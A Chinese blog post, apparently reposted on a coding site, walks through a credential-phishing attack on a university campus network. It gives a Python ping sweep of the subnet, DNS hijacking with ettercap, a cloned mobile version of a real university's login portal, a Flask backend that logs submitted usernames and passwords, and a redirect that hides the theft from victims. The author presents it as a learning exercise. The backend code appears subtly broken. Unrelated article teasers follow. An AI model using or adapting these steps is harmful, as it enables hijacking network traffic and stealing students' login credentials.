校园局域网钓鱼实例

Hello ! 我是"我是小恒不会java"

本文仅作为针对普通同学眼中的网络安全,设计的钓鱼案例也是怎么简陋怎么来

注:本文不会外传代码,后端已停止使用,仅作为学习使用

基本原理

内网主机扫描+DNS劫持+前端模拟+后端HTTP请求保存日志+前端重定向至真实网站

仿制前端

原本站点网址,这是作者仿制后实现的,后端Flask框架(打码了)

https://ca.csu.edu.cn/

内网主机扫描 

import os
import platformdef ping(host):if platform.system() == "Windows":response = os.system("ping -n 1 " + host)else:response = os.system("ping -c 1 " + host)return response == 0with open("active_ips.txt", "w") as f:for i in range(0, 255):for j in range(0, 255):ip = "100.65.{}.{}".format(i, j)if ping(ip):print("{} is active".format(ip))f.write(ip + "\n")

 python太慢,建议用批处理脚本。第一次写,没必要,就先用了

DNS劫持

准备:一台kail linux主机,连接校园网,使用ettercap进行DNS劫持

修改/etc/ettercap/etter.dns文件,根据提示按需进行劫持配置

先打开阿帕奇服务器,试试可用性,成功则如下图所示

前端仿制 

主要是针对移动端,我就只针对移动端进行特意修改

加上form表单,和falsk后端匹配。设置应用的秘钥,用于加密session数据。

实现一个简单的session登陆验证,并向后端发送加密信息,等待服务器响应

后端

def save_request_data():target_url = request.json['target_url']save_path = request.json['save_path']# 准备请求参数request_data = {'method': 'POST', 'url': target_url,'headers': request.headers.to_list(),  # 保存当前请求的 headers 为例'data': request.get_json() }# 发送请求到 httpbin(一个用于测试 HTTP 请求和响应的工具服务),以获取原始请求数据response = requests.post('https://httpbin.org/anything', json=request_data)if response.status_code == 200:# 解析 httpbin 返回的 JSON 数据,提取原始请求数据raw_request_data = response.json()['req']# 将原始请求数据写入文件with open(save_path, 'w', encoding='utf-8') as f:json.dump(raw_request_data, f, ensure_ascii=False, indent=4)return jsonify({'status': 'success', 'message': 'HTTP request data saved successfully.'})else:return jsonify({'status': 'error', 'message': f'Received non-successful status code {response.status_code} from the server.'}), response.status_code

服务器端保存请求内容,并正常返回响应,从而达到获取username和password的目的

重定向

在前端点击登陆后重定向至正确网址,用户只会认为网页卡顿了,再次输入信息后成功登陆校园门户网络

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/782217.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

HTTP和tcp的区别

HTTP(Hypertext Transfer Protocol)和TCP(Transmission Control Protocol)是互联网通信中的两个不同层次的协议,它们之间有着以下区别: 层次不同: TCP是传输层协议,负责在网络上可靠…

【2023】kafka入门学习与使用(kafka-2)

目录💻 一、基本介绍1、产生背景2、 消息队列介绍2.1、消息队列的本质作用2.2、消息队列的使用场景2.3、消息队列的两种模式2.4、消息队列选型: 二、kafka组件1、核心组件概念2、架构3、基本使用3.1、消费消息3.2、单播和多播消息的实现 4、主题和分区4.…

大模型与数据分析:探索Text-to-SQL

当今大模型如此火热,作为一名数据同学,持续在关注LLM是如何应用在数据分析中的,也关注到很多公司推出了AI数智助手的产品,比如火山引擎数智平台VeDI—AI助手、 Kyligence Copilot AI数智助理、ThoughtSpot等,通过接入人…

Node.js的Event Loop:六个阶段详解

🤍 前端开发工程师、技术日更博主、已过CET6 🍨 阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1 🕠 牛客高级专题作者、打造专栏《前端面试必备》 、《2024面试高频手撕题》 🍚 蓝桥云课签约作者、上架课程《Vue.js 和 E…

括号生成(回溯+剪枝)

22. 括号生成 - 力扣(LeetCode) 题目描述 数字 n 代表生成括号的对数,请你设计一个函数,用于能够生成所有可能的并且 有效的 括号组合。 样例输入 示例 1: 输入:n 3 输出:["((()))&q…

五年前端的面试之旅

哈喽我是树酱,最近整理了下前端面试相关的知识题库,借此分享给各位小伙伴,帮助小伙伴早日拿到钟意的offer! 前言 最近就业市场不景气,跟大环境较差也有关,确实给我们也会带来一定的挑战。在招聘网站投简历的…

数据仓库的发展历程

数据仓库的概念可以追溯到20世纪60年代,但真正形成理论并被企业广泛应用还需要一个较长的发展过程。大致可以分为以下几个阶段: 决策支持系统(DSS)时期(1960s-1970s) 这一时期,随着管理信息系统(MIS)和电子计算机的兴起,企业开始尝试构建面向决策的数据处理系统。最初的决策支…

python批量转化pdf图片为jpg图片

1.把pdf图片批量转为jpg;需要注意的是,需要先安装poppler这个软件,具体安装教程放在下面代码中了 2.代码 #poppler安装教程参考:https://blog.csdn.net/wy01415/article/details/110257130 #windows上poppler下载链接&#xff1a…

从零开始机器学习(机器学习 监督学习之线性回归 损失函数及可视化 梯度下降 线性回归的平方误差损失函数 lab实验)

文章目录 机器学习定义监督学习之线性回归损失函数及可视化梯度下降线性回归的平方误差损失函数lab实验 机器学习定义 机器学习就是机器通过不断训练数据集从逐渐知道正确的结果 机器学习包括监督学习和非监督学习 监督学习:需要输入数据和结果数据来不断训练学习…

Java-常见面试题收集(八)

十五 JDBC 1 JDBC 访问数据库的基本步骤 加载驱动,通过 DriverManager 对象获取连接对象 Connection,通过连接对象获取会话,通过会话进行数据的增删改查封装对象,关闭资源 2 PreparedStatement 和 Statement 的区别 PreparedSta…

linux0.11中jmpi 0,8解析

系统在执行该行代码时已经为保护模式, jmpi 0,8会将段选择子(selector)载入cs段寄存器,并计算出逻辑地址。 段选择子的结构如下: 段选择子包括三部分:描述符索引(index)、TI、请求特权级(RPL)。…

SpringMVC常见面试题

1:Spring mvc执行流程 回答: 版本1:视图版本,jsp 用户发送出请求到前端控制器DispatcherServletDispatcherServlet收到请求调用HandlerMapping(处理映射器)HandlerMapping找到具体的处理器,生成处理器对象及处理器拦…

ajax的优缺点有哪些?

我们先来介绍一下什么是ajax: 对于ajax的理解,ajax是一种使用现有技术集合技术内容包括: HTML或XHTML、CSS、 JavaScript、DOM、XML、 XSLT, 以及最重要的XMLHttpRequest。 用于浏览器与服务器之间使用异步数据传输(HTTP请求),做…

二十四种设计模式与六大设计原则(一):【策略模式、代理模式、单例模式、多例模式、工厂方法模式、抽象工厂模式】的定义、举例说明、核心思想、适用场景和优缺点

目录 策略模式【Strategy Pattern】 定义 举例说明 核心思想 适用场景 优缺点 代理模式【Proxy Pattern】 定义 举例说明 核心思想 适用场景 优缺点 单例模式【Singleton Pattern】 定义 举例说明 核心思想 适用场景 优缺点 多例模式【Multition Pattern】…

C# 微软官方学习文档

链接:https://learn.microsoft.com/zh-cn/dotnet/csharp/ 在C#的学习过程中,我们可以参考微软官方的学习文档。它是一个免费的学习平台,提供了丰富的C#学习路径和教程(如下图),对我们入门到高级应用开发都…

PhpWord导入试题

规定word导入格式 1、[单选题][2024][一般]题目1 A.选项1 B.选项2 C.选项3 D.选项4 答案:D 试题图片(上传多媒体图片): 分数:2 答案解析: 2、[多选题][2024][困难]题目2 A.选项1 B.选项2 C.选项3 D.选项4 E…

专升本-人工智能(AI)

人工智能(AI): 什么是人工智能:(总结:感知,获取,得出(结论,执行)) 运用数理逻辑和计算机成果,提供关于形式化计算和处理…

Math常用方法,什么是math?

首先我们先来介绍一下什么是math? Math是一个内置对象,具有数学常数和函数的属性和方法,不是一个函数对象, 数学是一个内置对象,具有数学常数和函数的属性和方法,不是一个函数对象Math适用于Number类型&…

微服务篇-C 深入理解第一代微服务(SpringCloud)_VIII 深入理解Bus消息总线

原创作者:田超凡(程序员田宝宝) 版权所有,引用请注明原作者,严禁复制转载 Part 1 理论部分 1 配置文件如何刷新? 在SpringCloud中,配置文件的刷新有手动刷新和实时刷新两种方式。 手动刷新使…

Hive详解(4)

Hive 窗口函数 分析函数 聚合函数,例如sum,avg,max,min等 移位函数 lag(colName, n):以当前行为基础,来处理第前n行的数据 lead(colName, n):以当前行为基础,来处理第后n行的数据 …